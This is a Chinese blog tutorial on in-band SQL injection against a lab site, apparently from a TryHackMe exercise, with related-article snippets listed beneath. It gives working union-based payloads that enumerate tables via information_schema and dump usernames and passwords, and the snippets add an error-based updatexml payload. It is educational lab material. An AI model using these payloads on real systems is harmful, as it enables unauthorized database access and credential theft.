SQL注入漏洞-明注

已于 2024-08-27 11:58:44 修改
阅读量434 收藏 8
点赞数 5
文章标签: sql 数据库 安全
于 2024-08-27 11:56:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Muffinblock/article/details/141529520
版权

SQL(Structured Query Language) injection (SQLi) 

是一种透过攻击数据库并让数据库执行非法指令,威胁之大在OWASP连续霸榜第一三年之久

数据库和sql这里就不多说了 如果不清楚这两个是什么 可以去看看sql视频

这里举个例子 比如一个网站url是 https://website.thm/blog?id=1

可以看到id=1 也就是从表格抓取了id为1并显示出来

SELECT * from blog where id=1 and private=0 LIMIT 1;
 

如果我们要调取id为2,而且假设2的private值是1 也就是是私人的

https://website.thm/blog?id=2;-- 


SELECT * from blog where id=2;-- and private=0 LIMIT 1;
 

--  这里代表着注释掉后面的query 也就是只执行了SELECT * from blog where id=2;

无论是否公开2的文章现在都会显示出来了

注入种类

明文注入(我个人喜欢这么叫) 但是系统的就是 In-Band Sql Injection

这里的注入比较简单 因为数据库会直接把错误显示在web上

这里举个例子 我们在原有的url 加入 ‘ 来看看回显是什么

这个时候我们能够看到报错回显了 证明了有sql注入漏洞并且是明文注入

第一步:

需要让他不报错并把正确回显给我们 我们这里可以试试

1 UNION SELECT 1

报错了 并且报错显示的是 有多列

我们可以一直试直到不报错 

我们试到 3列后就不报错了 证明okay了

第二步: 

从上图可以看到 正常返回了 但是sql会反馈第一个返回结果也就是1的结果,那么我们如果要深入渗透进去数据库 我们要第一个返回结果不是1的结果(1的结果就是文章)我们可以改成-1

改好之后就会发现文章不显示了 现在返回值 1,2,3 了

第三步:

确定用的数据库名字

-1 UNION SELECT 1,2,database()

可以看到原本3的值现在改成了sql 数据库的名字了

第四步

我们要挖出来sqli_one里面所含的东西

这里有几个东西要说一下

information_schema 数据库  每个用户都能访问 包含了所有数据库和表的信息

group_concat()方法 从多个返回的行中获取指定的列

table_name 表名字

0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'

这里就会返回了数据库里面所有表名字 我们可以看到这里有两个表 一个arcticle 一个staff_users

staff_users包含了所有用户密码 那么正常来说这个是黑客最想去的地方

-1 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'

这里我们找到了所有列名字 id,password,username

 

-1 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users

这里我们可以看到了密码出来了 明文注入就好了

Muffinblock
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache-Skywalking-SQL注入复现+利用(CVE-2020-9483)
0xSec
03-12 1402
当Apache SkyWalking使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。
Web安全Sql注入漏洞
qq_52358808的博客
10-05 3061
Sql注入漏洞 SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限沦陷)。 sql查询过程 常见分类 根据注入点类型分类:1.数字型注入 2.字符型注入 根据数据传递的方式分类:1.get 注入 2.post 注入 3.head 头注入 根据执行效果分类:1.有回显的注入 2.盲注 3.报错注入 4.堆叠注入 5.宽字节注入 Sql.
SQL注入漏洞扫描---sqlmap
嘿嘿嘿
05-03 2840
数据库--数据表---字段---字段内容一站式识别
通杀! 熬夜码的 - 八万字 - 让你一文读懂SQL注入漏洞原理及各种场景利用
易编橙 · 终身成长社群,相遇已是上上签!
10-24 2335
WEB攻防漏洞的本质 漏洞特定函数: 漏洞的成因必然会涉及到所用的函数,不同的开发语言都有一些特定的函数用于不同的作用。 有些函数用于数据库查询,有的函数用于文件读写,有的函数用于调试输出等。函数在使用的时候会和漏洞形成的关系是什么? 漏洞产生的原因必定会使用到类似的脚本语言的特定函数,比如SQL注入漏洞,必然会涉及到数据库查询操作类的相关函数。 这就是漏洞的特定函数。所以在代码层,我们就可以通过函数猜解存在有那些漏洞,反推也可以根据漏洞猜解使用了哪些特定函数。 传输可
SQL注入漏洞
weixin_68681298的博客
07-21 620
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息数据库就是一个存储数据的仓库,数据库是以一定方式存储在一起,能与多个用户共享,具有尽可能小的冗余,与应用程序彼此独立的数据集合。
白帽子之web漏洞---sql注入
鼓浪屿岛与海的博客
12-06 407
一.原理 通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句 二.危害 当攻击者注入的sql语句被发送到服务器端数据库中后,通过...
#常见漏洞解析—SQL注入-2
2301_78006725的博客
07-29 72
id=1' and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+ 爆出users表的字段。数据库版本:version() -----5.0以上为高版本。
SQL注入以及一些web题
2401_82388450的博客
04-03 809
1.进入页面,发现输入非零会有回显,输入零和字母就没有回显 2.此题使用堆叠注入,输入1;show databases;显示所有的库3.输入1;show tables;查所有的表4.输入1;show columns from Flag查flag表的字段,发现报错5.猜测过滤了一些内容,这里有两种方法构建payload:1.判断列数2.判断显错位3.爆数据库4.爆表名5.爆字段名6.爆数据,发现只有一半,想到使用substring()函数7. 发现substring()函数被过滤,使用mid函数,爆出后一半f
SQL注入——SQL注入漏洞讲解分类(零)
Gjqhs的博客
02-22 984
一、什么是SQL注入漏洞 攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系 统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后 台数据库乃至整个应用系统的入侵 二、SQL注入原理 服务端没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响 数据库安全和平台安全。 两个条件 用户能够控制输入 原本程序要执行的SQL语句,拼接了用户输入的恶意数据 三、SQL注入过程 ①攻击者访问有SQL注入漏洞的网站,寻找注入点 ②
-------已搬运------SQL注入的 过滤 思路 payload 万能密码
Zero_Adam的博客
04-28 1804
目录:一、过滤关键词:1. 过滤 `=` 可用 `like`,`regexp`,`in`来代替:2. 过滤`ascii`,不能用bool盲注了。可用`ord`来代替:3. `,`逗号被过滤了:1. `substr(***,1,1)` 用这个来代替:`substr(***from({})for(1))`2.`limit 0,1` 用这个来代替:`limit 1 offset {}`二、一些小trick1. 关于bool盲注的正确与否三、一些payload:1. 过滤了 空格,但是可以联合查询的bool注
菜鸟日记之SQL注入原理&万能密码注入
热门推荐
Blazar_star的博客
11-07 2万+
十一月二号,阴天,想听陈奕迅。 今天看到的这个还挺有意思的,SQL注入原理和万能密码。 数据库老师只是随口带过的一句话没想到竟然是SQL注入的关键.....果然...有自己独立的思考才是最重要的。 --------------------------------------------------------------------------------------------------...
sql自动化注入工具——sqlmap的使用
世间繁华梦一出
03-10 1229
sql漏洞自动注入工具——sqlmap一、sqlmap简介二、下载及安装三、sql使用参数详解四、sqlmap进行sql注入常规使用步骤![在这里插入图片描述](https://img-blog.csdnimg.cn/20210310165741681.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6d3doaHBw,size_16,color_
【信息安全】pikachu-SQL注入
Nicky_Zheng的博客
09-02 368
数字型注入 使用 1 or 1=1#探测,使用burpsuite截断post请求,修改提交的请求 使用 1 or 1=2#探测,使用burpsuite截断post请求,修改提交的请求 说明该处存在SQL注入 接下来需要使用order by 判断列数 oder by 2返回结果正常,说明只有2列 确认列数后,可使用union select获取数据库名、用户名 1 union select database(),user()# 通过information_schema获取当前数据库表名 根据表名
漏洞披露-金慧-综合管理信息系统-SQL
无问社区的博客
08-27 505
金慧数据资产管理平台是一款企业级数据资产管理软件,其基于先进的技术架构,具备操作简单、部署灵活、快速响应等特点。由于金慧-综合管理信息系统 LoginBegin.aspx(登录接口处)没有对外部输入的SQL语句进行严格的校验和过滤,直接带入数据库执行,导致未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
SQL统计行数的语句
曹昆的技术博客
08-27 371
SQL 中,你可以使用 COUNT() 函数来统计查询结果的行数。这个函数可以用在不同的上下文中,具体取决于你想要统计的内容。
SQL 注入新视角:堆查询、JSON 与头部 XFF 注入剖析及防范
最新发布
2301_77160226的博客
08-27 2134
SQL 注入攻击的世界中,除了一些常见的注入方式外,还有堆查询注入、JSON 注入以及头部 XFF 注入等较为特殊的攻击手段。这些攻击方式利用不同的场景和漏洞,对数据库安全构成严重威胁。本文将详细介绍这三种 SQL 注入攻击方式的原理和特点。
推荐一篇 学习SQL 的文章
m0_66975650的博客
08-26 502
学习 java,当然避不开数据库的知识,个人认为好学好理解的一篇文章,推荐给大家
PostgreSQL如何设置主键自增(序列、SERIAL)
西京刀客
08-26 1208
在使用Mysql时,创建表结构时可以通过关键字auto_increment来指定主键是否自增。但在Postgresql数据库中,虽然可以实现字段的自增,但从本质上来说却并不支持Mysql那样的自增。
SQL注入漏洞-手工注入
05-21
对于SQL注入漏洞的手工注入,建议使用一些工具来进行测试,如SQLMap、Havij等。这些工具可以通过一些特定的语句来测试目标网站是否存在SQL注入漏洞,并且可以自动化执行攻击,并且提供详细的攻击日志,方便测试人员进行漏洞的修复和弥补。但是需要注意的是,在使用这些工具进行测试时,一定要严格遵守相关法律法规,不得滥用,以免造成不必要的损失和困扰。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值